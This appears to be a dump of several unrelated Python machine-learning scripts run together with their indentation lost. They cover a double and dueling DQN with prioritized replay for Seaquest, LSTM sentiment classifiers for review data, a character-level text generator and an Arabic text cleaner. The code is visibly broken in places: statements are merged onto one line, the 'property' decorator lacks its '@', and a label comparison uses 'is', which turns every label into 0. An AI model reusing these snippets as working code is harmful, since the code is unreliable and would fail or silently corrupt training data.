batch.append( (idx, data) )
return batch
def update(self, idx, error):
p = self._getPriority(error)
self.tree.update(idx, p)
#-------------------- AGENT ---------------------------
MEMORY_CAPACITY = 50_000
BATCH_SIZE = 32
GAMMA = 0.95
MAX_EPSILON = 1
MIN_EPSILON = 0.05
EXPLORATION_STOP = 500_000 # at this step epsilon will be 0.01
LAMBDA = - math.log(0.01) / EXPLORATION_STOP # speed of decay
UPDATE_TARGET_FREQUENCY = 10_000
UPDATE_STATS_EVERY = 5
RENDER_EVERY = 50
class Agent:
steps = 0
epsilon = MAX_EPSILON
def __init__(self, stateCnt, actionCnt, brain):
self.stateCnt = stateCnt
self.actionCnt = actionCnt
self.brain = brain
# self.memory = Memory(MEMORY_CAPACITY)
def act(self, s):
if random.random() < self.epsilon:
return random.randint(0, self.actionCnt-1)
else:
return numpy.argmax(self.brain.predictOne(s))
def observe(self, sample): # in (s, a, r, s_) format
x, y, errors = self._getTargets([(0, sample)])
self.memory.add(errors[0], sample)
if self.steps % UPDATE_TARGET_FREQUENCY == 0:
self.brain.updateTargetModel()
# slowly decrease Epsilon based on our eperience
self.steps += 1
self.epsilon = MIN_EPSILON + (MAX_EPSILON - MIN_EPSILON) * math.exp(-LAMBDA * self.steps)
def _getTargets(self, batch):
no_state = numpy.zeros(self.stateCnt)
states = numpy.array([ o[1][0] for o in batch ])
states_ = numpy.array([ (no_state if o[1][3] is None else o[1][3]) for o in batch ])
p = agent.brain.predict(states)
p_ = agent.brain.predict(states_, target=False)
pTarget_ = agent.brain.predict(states_, target=True)
x = numpy.zeros((len(batch), IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT))
y = numpy.zeros((len(batch), self.actionCnt))
errors = numpy.zeros(len(batch))
for i in range(len(batch)):
o = batch[i][1]
s = o[0] a = o[1] r = o[2] s_ = o[3]
t = p[i]
oldVal = t[a]
if s_ is None:
t[a] = r
else:
t[a] = r + GAMMA * pTarget_[i][ numpy.argmax(p_[i]) ] # double DQN
x[i] = s
y[i] = t
errors[i] = abs(oldVal - t[a])
return (x, y, errors)
def replay(self):
batch = self.memory.sample(BATCH_SIZE)
x, y, errors = self._getTargets(batch)
# update errors
for i in range(len(batch)):
idx = batch[i][0]
self.memory.update(idx, errors[i])
self.brain.train(x, y)
class RandomAgent:
memory = Memory(MEMORY_CAPACITY)
exp = 0
epsilon = MAX_EPSILON
def __init__(self, actionCnt, brain):
self.actionCnt = actionCnt
self.brain = brain
def act(self, s):
return random.randint(0, self.actionCnt-1)
def observe(self, sample): # in (s, a, r, s_) format
error = abs(sample[2]) # reward
self.memory.add(error, sample)
self.exp += 1
def replay(self):
pass
#-------------------- ENVIRONMENT ---------------------
class Environment:
def __init__(self, problem):
self.problem = problem
self.env = gym.make(problem)
self.ep_rewards = deque(maxlen=UPDATE_STATS_EVERY)
def run(self, agent, step):
img = self.env.reset()
w = processImage(img)
s = numpy.array([w, w])
agent.brain.tensorboard.step = step
R = 0
while True:
if step % RENDER_EVERY == 0:
self.env.render()
a = agent.act(s)
img, r, done, info = self.env.step(a)
s_ = numpy.array([s[1], processImage(img)]) #last two screens
r = np.clip(r, -1, 1) # clip reward to [-1, 1]
if done: # terminal state
s_ = None
agent.observe( (s, a, r, s_) )
agent.replay()
s = s_
R += r
if done:
break
self.ep_rewards.append(R)
avg_reward = sum(self.ep_rewards) / len(self.ep_rewards)
if step % UPDATE_STATS_EVERY == 0:
min_reward = min(self.ep_rewards)
max_reward = max(self.ep_rewards)
agent.brain.tensorboard.update_stats(reward_avg=avg_reward, reward_min=min_reward, reward_max=max_reward, epsilon=agent.epsilon)
agent.brain.model.save(f"models/{model_name}-avg-{avg_reward:.2f}-min-{min_reward:.2f}-max-{max_reward:2f}.h5")
# print("Total reward:", R)
return avg_reward
#-------------------- MAIN ----------------------------
PROBLEM = 'Seaquest-v0'
env = Environment(PROBLEM)
episodes = 2_000
stateCnt = (IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT)
actionCnt = env.env.action_space.n
brain = Brain(stateCnt, actionCnt)
agent = Agent(stateCnt, actionCnt, brain)
randomAgent = RandomAgent(actionCnt, brain)
step = 0
try:
print("Initialization with random agent...")
while randomAgent.exp < MEMORY_CAPACITY:
step += 1
env.run(randomAgent, step)
print(randomAgent.exp, "/", MEMORY_CAPACITY)
agent.memory = randomAgent.memory
randomAgent = None
print("Starting learning")
for i in tqdm.tqdm(list(range(step+1, episodes+step+1))):
env.run(agent, i)
finally:
agent.brain.model.save("Seaquest-DQN-PER.h5")
import numpy as np
class SumTree:
"""
This SumTree code is modified version of Morvan Zhou:
https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow/blob/master/contents/5.2_Prioritized_Replay_DQN/RL_brain.py
"""
data_pointer = 0
def __init__(self, length):
# number of leaf nodes (final nodes that contains experiences)
self.length = length
# generate the tree with all nodes' value = 0
# binary node (each node has max 2 children) so 2x size of leaf capacity - 1
# parent nodes = length - 1
# leaf nodes = length
self.tree = np.zeros(2*self.length - 1)
# contains the experiences
self.data = np.zeros(self.length, dtype=object)
def add(self, priority, data):
"""
Add priority score in the sumtree leaf and add the experience in data
"""
# look at what index we want to put the experience
tree_index = self.data_pointer + self.length - 1
#tree:
# 0
# / \
# 0 0
# / \ / \
#tree_index 0 0 0 We fill the leaves from left to right
self.data[self.data_pointer] = data
# update the leaf
self.update(tree_index, priority)
# increment data pointer
self.data_pointer += 1
# if we're above the capacity, we go back to the first index
if self.data_pointer >= self.length:
self.data_pointer = 0
def update(self, tree_index, priority):
"""
Update the leaf priority score and propagate the change through the tree
"""
# change = new priority score - former priority score
change = priority - self.tree[tree_index]
self.tree[tree_index] = priority
while tree_index != 0: # this method is faster than the recursive loop in the reference code
"""
Here we want to access the line above
THE NUMBERS IN THIS TREE ARE THE INDEXES NOT THE PRIORITY VALUES
0
/ \
1 2
/ \ / \
3 4 5 [6]
If we are in leaf at index 6, we updated the priority score
We need then to update index 2 node
So tree_index = (tree_index - 1) // 2
tree_index = (6-1)//2
tree_index = 2 (because // round the result)
"""
tree_index = (tree_index - 1) // 2
self.tree[tree_index] += change
"""
Here we get the leaf_index, priority value of that leaf and experience associated with that index
"""
def get_leaf(self, v):
"""
Tree structure and array storage:
Tree index:
0 -> storing priority sum
/ \
1 2
/ \ / \
3 4 5 6 -> storing priority for experiences
Array type for storing:
[0,1,2,3,4,5,6]
"""
parent_index = 0
while True: # the while loop is faster than the method in the reference code
left_child_index = 2 * parent_index + 1
right_child_index = left_child_index + 1
# If we reach bottom, end the search
if left_child_index >= len(self.tree):
leaf_index = parent_index
break
else: # downward search, always search for a higher priority node
if v <= self.tree[left_child_index]:
parent_index = left_child_index
else:
v -= self.tree[left_child_index]
parent_index = right_child_index
data_index = leaf_index - self.length + 1
return leaf_index, self.tree[leaf_index], self.data[data_index]
property
def total_priority(self):
return self.tree[0] # Returns the root node
class Memory:
# we use this to avoid some experiences to have 0 probability of getting picked
PER_e = 0.01
# we use this to make a tradeoff between taking only experiences with high priority
# and sampling randomly
PER_a = 0.6
# we use this for importance sampling, from this to 1 through the training
PER_b = 0.4
PER_b_increment_per_sample = 0.001
absolute_error_upper = 1.0
def __init__(self, capacity):
# the tree is composed of a sum tree that contains the priority scores and his leaf
# and also a data list
# we don't use deque here because it means that at each timestep our experiences change index by one
# we prefer to use a simple array to override when the memory is full
self.tree = SumTree(length=capacity)
def store(self, experience):
"""
Store a new experience in our tree
Each new experience have a score of max_priority (it'll be then improved)
"""
# find the max priority
max_priority = np.max(self.tree.tree[-self.tree.length:])
# if the max priority = 0 we cant put priority = 0 since this exp will never have a chance to be picked
# so we use a minimum priority
if max_priority == 0:
max_priority = self.absolute_error_upper
# set the max p for new p
self.tree.add(max_priority, experience)
def sample(self, n):
"""
- First, to sample a minimatch of k size, the range [0, priority_total] is / into k ranges.
- then a value is uniformly sampled from each range
- we search in the sumtree, the experience where priority score correspond to sample values are
retrieved from.
- then, we calculate IS weights for each minibatch element
"""
# create a sample list that will contains the minibatch
memory = []
b_idx, b_is_weights = np.zeros((n, ), dtype=np.int32), np.zeros((n, 1), dtype=np.float32)
# calculate the priority segment
# here, as explained in the paper, we divide the range [0, ptotal] into n ranges
priority_segment = self.tree.total_priority / n
# increase b each time
self.PER_b = np.min([1., self.PER_b + self.PER_b_increment_per_sample])
# calculating the max weight
p_min = np.min(self.tree.tree[-self.tree.length:]) / self.tree.total_priority
max_weight = (p_min * n) ** (-self.PER_b)
for i in range(n):
a, b = priority_segment * i, priority_segment * (i + 1)
value = np.random.uniform(a, b)
# experience that correspond to each value is retrieved
index, priority, data = self.tree.get_leaf(value)
# P(j)
sampling_probs = priority / self.tree.total_priority
# IS = (1/N * 1/P(i))**b /max wi == (N*P(i))**-b /max wi
b_is_weights[i, 0] = np.power(n * sampling_probs, -self.PER_b)/ max_weight
b_idx[i]= index
experience = [data]
memory.append(experience)
return b_idx, memory, b_is_weights
def batch_update(self, tree_idx, abs_errors):
"""
Update the priorities on the tree
"""
abs_errors += self.PER_e
clipped_errors = np.min([abs_errors, self.absolute_error_upper])
ps = np.power(clipped_errors, self.PER_a)
for ti, p in zip(tree_idx, ps):
self.tree.update(ti, p)
import tensorflow as tf
class DDDQNNet:
""" Dueling Double Deep Q Neural Network """
def __init__(self, state_size, action_size, learning_rate, name):
self.state_size = state_size
self.action_size = action_size
self.learning_rate = learning_rate
self.name = name
# we use tf.variable_scope to know which network we're using (DQN or the Target net)
# it'll be helpful when we will update our w- parameters (by copy the DQN parameters)
with tf.variable_scope(self.name):
# we create the placeholders
self.inputs_ = tf.placeholder(tf.float32, [None, *state_size], name="inputs")
self.is_weights_ = tf.placeholder(tf.float32, [None, 1], name="is_weights")
self.actions_ = tf.placeholder(tf.float32, [None, self.action_size], name="actions_")
# target Q
self.target_q = tf.placeholder(tf.float32, [None], name="target")
# neural net
self.dense1 = tf.layers.dense(inputs=self.inputs_,
units=32,
name="dense1",
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation="relu")
self.dense2 = tf.layers.dense(inputs=self.dense1,
units=32,
name="dense2",
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation="relu")
self.dense3 = tf.layers.dense(inputs=self.dense2,
units=32,
name="dense3",
kernel_initializer=tf.contrib.layers.xavier_initializer())
# here we separate into two streams (dueling)
# this one is State-Function V(s)
self.value = tf.layers.dense(inputs=self.dense3,
units=1,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
activation=None,
name="value"
)
# and this one is Value-Function A(s, a)
self.advantage = tf.layers.dense(inputs=self.dense3,
units=self.action_size,
activation=None,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name="advantage"
)
# aggregation
# Q(s, a) = V(s) + ( A(s, a) - 1/|A| * sum A(s, a') )
self.output = self.value + tf.subtract(self.advantage, tf.reduce_mean(self.advantage, axis=1, keepdims=True))
# Q is our predicted Q value
self.Q = tf.reduce_sum(tf.multiply(self.output, self.actions_))
self.absolute_errors = tf.abs(self.target_q - self.Q)
# w- * (target_q - q)**2
self.loss = tf.reduce_mean(self.is_weights_ * tf.squared_difference(self.target_q, self.Q))
self.optimizer = tf.train.RMSPropOptimizer(self.learning_rate).minimize(self.loss)
import numpy
class SumTree:
write = 0
def __init__(self, capacity):
self.capacity = capacity
self.tree = numpy.zeros( 2*capacity - 1 )
self.data = numpy.zeros( capacity, dtype=object )
def _propagate(self, idx, change):
parent = (idx - 1) // 2
self.tree[parent] += change
if parent != 0:
self._propagate(parent, change)
def _retrieve(self, idx, s):
left = 2 * idx + 1
right = left + 1
if left >= len(self.tree):
return idx
if s <= self.tree[left]:
return self._retrieve(left, s)
else:
return self._retrieve(right, s-self.tree[left])
def total(self):
return self.tree[0]
def add(self, p, data):
idx = self.write + self.capacity - 1
self.data[self.write] = data
self.update(idx, p)
self.write += 1
if self.write >= self.capacity:
self.write = 0
def update(self, idx, p):
change = p - self.tree[idx]
self.tree[idx] = p
self._propagate(idx, change)
def get(self, s):
idx = self._retrieve(0, s)
dataIdx = idx - self.capacity + 1
return (idx, self.tree[idx], self.data[dataIdx])
import numpy as np
from string import punctuation
from collections import Counter
from sklearn.model_selection import train_test_split
with open("data/reviews.txt") as f:
reviews = f.read()
with open("data/labels.txt") as f:
labels = f.read()
# remove all punctuations
all_text = ''.join([ c for c in reviews if c not in punctuation ])
reviews = all_text.split("\n")
reviews = [ review.strip() for review in reviews ]
all_text = ' '.join(reviews)
words = all_text.split()
print("Total words:", len(words))
# encoding the words
# dictionary that maps vocab words to integers here
vocab = sorted(set(words))
print("Unique words:", len(vocab))
# start is 1 because 0 is encoded for blank
vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
# encoded reviews
encoded_reviews = []
for review in reviews:
encoded_reviews.append([vocab2int[word] for word in review.split()])
encoded_reviews = np.array(encoded_reviews)
# print("Number of reviews:", len(encoded_reviews))
# encode the labels, 1 for 'positive' and 0 for 'negative'
labels = labels.split("\n")
labels = [1 if label is 'positive' else 0 for label in labels]
# print("Number of labels:", len(labels))
review_lens = [len(x) for x in encoded_reviews]
counter_reviews_lens = Counter(review_lens)
# remove any reviews with 0 length
cleaned_encoded_reviews, cleaned_labels = [], []
for review, label in zip(encoded_reviews, labels):
if len(review) != 0:
cleaned_encoded_reviews.append(review)
cleaned_labels.append(label)
encoded_reviews = np.array(cleaned_encoded_reviews)
labels = cleaned_labels
# print("Number of reviews:", len(encoded_reviews))
# print("Number of labels:", len(labels))
sequence_length = 200
features = np.zeros((len(encoded_reviews), sequence_length), dtype=int)
for i, review in enumerate(encoded_reviews):
features[i, -len(review):] = review[:sequence_length]
# print(features[:10, :100])
# split data into train, validation and test
split_frac = 0.9
X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=1-split_frac)
X_test, X_validation, y_test, y_validation = train_test_split(X_test, y_test, test_size=0.5)
print(f"""Features shapes:
Train set: {X_train.shape}
Validation set: {X_validation.shape}
Test set: {X_test.shape}""")
print("Example:")
print(X_train[0])
print(y_train[0])
# X_train, X_validation = features[:split_frac*len(features)], features[split_frac*len(features):]
# y_train, y_validation = labels[:split]
import tensorflow as tf
from utils import get_batches
from train import *
import tensorflow as tf
from preprocess import vocab2int, X_train, y_train, X_validation, y_validation, X_test, y_test
from utils import get_batches
import numpy as np
def get_lstm_cell():
# basic LSTM cell
lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
# dropout to the cell
drop = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
return drop
# RNN paramaters
lstm_size = 256
lstm_layers = 1
batch_size = 256
learning_rate = 0.001
n_words = len(vocab2int) + 1 # Added 1 for the 0 that is for padding
# create the graph object
graph = tf.Graph()
# add nodes to the graph
with graph.as_default():
inputs = tf.placeholder(tf.int32, (None, None), "inputs")
labels = tf.placeholder(tf.int32, (None, None), "labels")
keep_prob = tf.placeholder(tf.float32, name="keep_prob")
# number of units in the embedding layer
embedding_size = 300
with graph.as_default():
# embedding lookup matrix
embedding = tf.Variable(tf.random_uniform((n_words, embedding_size), -1, 1))
# pass to the LSTM cells
embed = tf.nn.embedding_lookup(embedding, inputs)
# stackup multiple LSTM layers
cell = tf.contrib.rnn.MultiRNNCell([get_lstm_cell() for i in range(lstm_layers)])
initial_state = cell.zero_state(batch_size, tf.float32)
# pass cell and input to cell, returns outputs for each time step
# and the final state of the hidden layer
# run the data through the rnn nodes
outputs, final_state = tf.nn.dynamic_rnn(cell, embed, initial_state=initial_state)
# grab the last output
# use sigmoid for binary classification
predictions = tf.contrib.layers.fully_connected(outputs[:, -1], 1, activation_fn=tf.sigmoid)
# calculate cost using MSE
cost = tf.losses.mean_squared_error(labels, predictions)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
# nodes to calculate the accuracy
correct_pred = tf.equal(tf.cast(tf.round(predictions), tf.int32), labels)
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
saver = tf.train.Saver()
########### training ##########
epochs = 10
with tf.Session(graph=graph) as sess:
sess.run(tf.global_variables_initializer())
iteration = 1
for e in range(epochs):
state = sess.run(initial_state)
for i, (x, y) in enumerate(get_batches(X_train, y_train, batch_size=batch_size)):
y = np.array(y)
x = np.array(x)
feed = {inputs: x, labels: y[:, None],
keep_prob: 0.5,
initial_state: state}
loss, state, _ = sess.run([cost, final_state, optimizer], feed_dict=feed)
if iteration % 5 == 0:
print(f"[Epoch: {e}/{epochs}] Iteration: {iteration} Train loss: {loss:.3f}")
if iteration % 25 == 0:
val_acc = []
val_state = sess.run(cell.zero_state(batch_size, tf.float32))
for x, y in get_batches(X_validation, y_validation, batch_size=batch_size):
x, y = np.array(x), np.array(y)
feed = {inputs: x, labels: y[:, None],
keep_prob: 1, initial_state: val_state}
batch_acc, val_state = sess.run([accuracy, final_state], feed_dict=feed)
val_acc.append(batch_acc)
print(f"val_acc: {np.mean(val_acc):.3f}")
iteration += 1
saver.save(sess, "chechpoints/sentiment1.ckpt")
test_acc = []
with tf.Session(graph=graph) as sess:
saver = tf.train.Saver()
saver.restore(sess, tf.train.latest_checkpoint('checkpoints'))
test_state = sess.run(cell.zero_state(batch_size, tf.float32))
for ii, (x, y) in enumerate(get_batches(X_test, y_test, batch_size), 1):
feed = {inputs: x,
labels: y[:, None],
keep_prob: 1,
initial_state: test_state}
batch_acc, test_state = sess.run([accuracy, final_state], feed_dict=feed)
test_acc.append(batch_acc)
print("Test accuracy: {:.3f}".format(np.mean(test_acc)))
def get_batches(x, y, batch_size=100):
n_batches = len(x) // batch_size
x, y = x[:n_batches*batch_size], y[:n_batches*batch_size]
for i in range(0, len(x), batch_size):
yield x[i: i+batch_size], y[i: i+batch_size]
import numpy as np
import pandas as pd
import tqdm
from string import punctuation
punc = set(punctuation)
df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
X = np.zeros((len(df), 2), dtype=object)
for i in tqdm.tqdm(range(len(df)), "Cleaning X"):
target = df['Text'].loc[i]
# X.append(''.join([ c.lower() for c in target if c not in punc ]))
X[i, 0] = ''.join([ c.lower() for c in target if c not in punc ])
X[i, 1] = df['Score'].loc[i]
pd.DataFrame(X, columns=["Text", "Score"]).to_csv("data/Reviews.csv")
### Model Architecture hyper parameters
embedding_size = 64
# sequence_length = 500
sequence_length = 42
LSTM_units = 128
### Training parameters
batch_size = 128
epochs = 20
### Preprocessing parameters
# words that occur less than n times to be deleted from dataset
N = 10
# test size in ratio, train size is 1 - test_size
test_size = 0.15
from keras.models import Sequential
from keras.layers import Embedding, LSTM, Dense, Activation, LeakyReLU, Dropout, TimeDistributed
from keras.layers import SpatialDropout1D
from config import LSTM_units
def get_model_binary(vocab_size, sequence_length):
embedding_size = 64
model=Sequential()
model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
model.add(SpatialDropout1D(0.15))
model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(1, activation='sigmoid'))
model.summary()
return model
def get_model_5stars(vocab_size, sequence_length, embedding_size, verbose=0):
model=Sequential()
model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
model.add(SpatialDropout1D(0.15))
model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(1, activation="linear"))
if verbose:
model.summary()
return model
import numpy as np
import pandas as pd
import tqdm
import pickle
from collections import Counter
from sklearn.model_selection import train_test_split
from utils import clean_text, tokenize_words
from config import N, test_size
def load_review_data():
# df = pd.read_csv("data/Reviews.csv")
df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
# preview
print(df.head())
print(df.tail())
vocab = []
# X = np.zeros((len(df)*2, 2), dtype=object)
X = np.zeros((len(df), 2), dtype=object)
# for i in tqdm.tqdm(range(len(df)), "Cleaning X1"):
# target = df['Text'].loc[i]
# score = df['Score'].loc[i]
# X[i, 0] = clean_text(target)
# X[i, 1] = score
# for word in X[i, 0].split():
# vocab.append(word)
# k = i+1
k = 0
for i in tqdm.tqdm(range(len(df)), "Cleaning X2"):
target = df['Summary'].loc[i]
score = df['Score'].loc[i]
X[i+k, 0] = clean_text(target)
X[i+k, 1] = score
for word in X[i+k, 0].split():
vocab.append(word)
# vocab = set(vocab)
vocab = Counter(vocab)
# delete words that occur less than 10 times
vocab = { k:v for k, v in vocab.items() if v >= N }
# word to integer encoder dict
vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
# pickle int2vocab for testing
print("Pickling vocab2int...")
pickle.dump(vocab2int, open("data/vocab2int.pickle", "wb"))
# encoded reviews
for i in tqdm.tqdm(range(X.shape[0]), "Tokenizing words"):
X[i, 0] = tokenize_words(str(X[i, 0]), vocab2int)
lengths = [ len(row) for row in X[:, 0] ]
print("min_length:", min(lengths))
print("max_length:", max(lengths))
X_train, X_test, y_train, y_test = train_test_split(X[:, 0], X[:, 1], test_size=test_size, shuffle=True, random_state=19)
return X_train, X_test, y_train, y_test, vocab
import os
# disable keras loggings
import sys
stderr = sys.stderr
sys.stderr = open(os.devnull, 'w')
import keras
sys.stderr = stderr
# to use CPU
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from model import get_model_5stars
from utils import clean_text, tokenize_words
from config import embedding_size, sequence_length
from keras.preprocessing.sequence import pad_sequences
import pickle
vocab2int = pickle.load(open("data/vocab2int.pickle", "rb"))
model = get_model_5stars(len(vocab2int), sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V20_0.38_0.80.h5")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Food Review evaluator")
parser.add_argument("review", type=str, help="The review of the product in text")
args = parser.parse_args()
review = tokenize_words(clean_text(args.review), vocab2int)
x = pad_sequences([review], maxlen=sequence_length)
print(f"{model.predict(x)[0][0]:.2f}/5")
# to use CPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import os
import numpy as np
import pandas as pd
from keras.callbacks import ModelCheckpoint
from keras.preprocessing import sequence
from preprocess import load_review_data
from model import get_model_5stars
from config import sequence_length, embedding_size, batch_size, epochs
X_train, X_test, y_train, y_test, vocab = load_review_data()
vocab_size = len(vocab)
print("Vocab size:", vocab_size)
X_train = sequence.pad_sequences(X_train, maxlen=sequence_length)
X_test = sequence.pad_sequences(X_test, maxlen=sequence_length)
print("X_train.shape:", X_train.shape)
print("X_test.shape:", X_test.shape)
print("y_train.shape:", y_train.shape)
print("y_test.shape:", y_test.shape)
model = get_model_5stars(vocab_size, sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V40_0.60_0.67.h5")
model.compile(loss="mse", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/model_V40_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=True, verbose=1)
model.fit(X_train, y_train, epochs=epochs,
validation_data=(X_test, y_test),
batch_size=batch_size,
callbacks=[checkpointer])
import numpy as np
from string import punctuation
# make it a set to accelerate tests
punc = set(punctuation)
def clean_text(text):
return ''.join([ c.lower() for c in str(text) if c not in punc ])
def tokenize_words(words, vocab2int):
words = words.split()
tokenized_words = np.zeros((len(words),))
for j in range(len(words)):
try:
tokenized_words[j] = vocab2int[words[j]]
except KeyError:
# didn't add any unk, just ignore
pass
return tokenized_words
import numpy as np
import pickle
import tqdm
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout, Activation
from keras.callbacks import ModelCheckpoint
seed = "import os"
# output:
# ded of and alice as it go on and the court
# well you wont you wouldncopy thing
# there was not a long to growing anxiously any only a low every cant
# go on a litter which was proves of any only here and the things and the mort meding and the mort and alice was the things said to herself i cant remeran as if i can repeat eften to alice any of great offf its archive of and alice and a cancur as the mo
char2int = pickle.load(open("python-char2int.pickle", "rb"))
int2char = pickle.load(open("python-int2char.pickle", "rb"))
sequence_length = 100
n_unique_chars = len(char2int)
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
# generate 400 characters
generated = ""
for i in tqdm.tqdm(range(400), "Generating text"):
# make the input sequence
X = np.zeros((1, sequence_length, n_unique_chars))
for t, char in enumerate(seed):
X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1
# predict the next character
predicted = model.predict(X, verbose=0)[0]
# converting the vector to an integer
next_index = np.argmax(predicted)
# converting the integer to a character
next_char = int2char[next_index]
# add the character to results
generated += next_char
# shift seed and the predicted character
seed = seed[1:] + next_char
print("Generated text:")
print(generated)
import numpy as np
import os
import pickle
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout
from keras.callbacks import ModelCheckpoint
from utils import get_batches
# import requests
# content = requests.get("http://www.gutenberg.org/cache/epub/11/pg11.txt").text
# open("data/wonderland.txt", "w", encoding="utf-8").write(content)
from string import punctuation
# read the data
# text = open("data/wonderland.txt", encoding="utf-8").read()
text = open("E:\\datasets\\text\\my_python_code.py").read()
# remove caps
text = text.lower()
for c in "!":
text = text.replace(c, "")
# text = text.lower().replace("\n\n", "\n").replace("", "").replace("", "").replace("", "").replace("", "")
# text = text.translate(str.maketrans("", "", punctuation))
# text = text[:100_000]
n_chars = len(text)
unique_chars = ''.join(sorted(set(text)))
print("unique_chars:", unique_chars)
n_unique_chars = len(unique_chars)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(unique_chars)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(unique_chars)}
# save these dictionaries for later generation
pickle.dump(char2int, open("python-char2int.pickle", "wb"))
pickle.dump(int2char, open("python-int2char.pickle", "wb"))
# hyper parameters
sequence_length = 100
step = 1
batch_size = 128
epochs = 1
sentences = []
y_train = []
for i in range(0, len(text) - sequence_length, step):
sentences.append(text[i: i + sequence_length])
y_train.append(text[i+sequence_length])
print("Number of sentences:", len(sentences))
X = get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps=step)
# for i, x in enumerate(X):
# if i == 1:
# break
# print(x[0].shape, x[1].shape)
# # vectorization
# X = np.zeros((len(sentences), sequence_length, n_unique_chars))
# y = np.zeros((len(sentences), n_unique_chars))
# for i, sentence in enumerate(sentences):
# for t, char in enumerate(sentence):
# X[i, t, char2int[char]] = 1
# y[i, char2int[y_train[i]]] = 1
# X = np.array([char2int[c] for c in text])
# print("X.shape:", X.shape)
# goal of X is (n_samples, sequence_length, n_chars)
# sentences = np.zeros(())
# print("y.shape:", y.shape)
# building the model
# model = Sequential([
# LSTM(128, input_shape=(sequence_length, n_unique_chars)),
# Dense(n_unique_chars, activation="softmax"),
# ])
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
model.summary()
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpoint = ModelCheckpoint("results/python-v2-{loss:.2f}.h5", verbose=1)
# model.fit(X, y, batch_size=batch_size, epochs=epochs, callbacks=[checkpoint])
model.fit_generator(X, steps_per_epoch=len(sentences) // batch_size, epochs=epochs, callbacks=[checkpoint])
import numpy as np
def get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps):
chars_per_batch = batch_size * n_steps
n_batches = len(sentences) // chars_per_batch
while True:
for i in range(0, len(sentences), batch_size):
X = np.zeros((batch_size, sequence_length, n_unique_chars))
y = np.zeros((batch_size, n_unique_chars))
for i, sentence in enumerate(sentences[i: i+batch_size]):
for t, char in enumerate(sentence):
X[i, t, char2int[char]] = 1
y[i, char2int[y_train[i]]] = 1
yield X, y
from pyarabic.araby import ALPHABETIC_ORDER
with open("quran.txt", encoding="utf8") as f:
text = f.read()
unique_chars = set(text)
print("unique chars:", unique_chars)
arabic_alpha = { c for c, order in ALPHABETIC_ORDER.items() }
to_be_removed = unique_chars - arabic_alpha
to_be_removed = to_be_removed - {'.', ' ', ''}
print(to_be_removed)
text = text.replace("", ".")
for char in to_be_removed:
text = text.replace(char, "")
text = text.replace(" ", " ")
text = text.replace(" \n", "")
text = text.replace("\n ", "")
with open("quran_cleaned.txt", "w", encoding="utf8") as f:
print(text, file=f)
from sklearn.model_selection import GridSearchCV
from keras.wrappers.scikit_learn import KerasClassifier
from utils import read_data, text_to_sequence, get_batches, get_data
from models import rnn_model
from keras.layers import LSTM
import numpy as np
text, int2char, char2int = read_data()
batch_size = 256
test_size = 0.2
n_steps = 200
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
X, Y = get_data(X_train, batch_size, n_steps, vocab_size=vocab_size+1)
print(X.shape)
print(Y.shape)
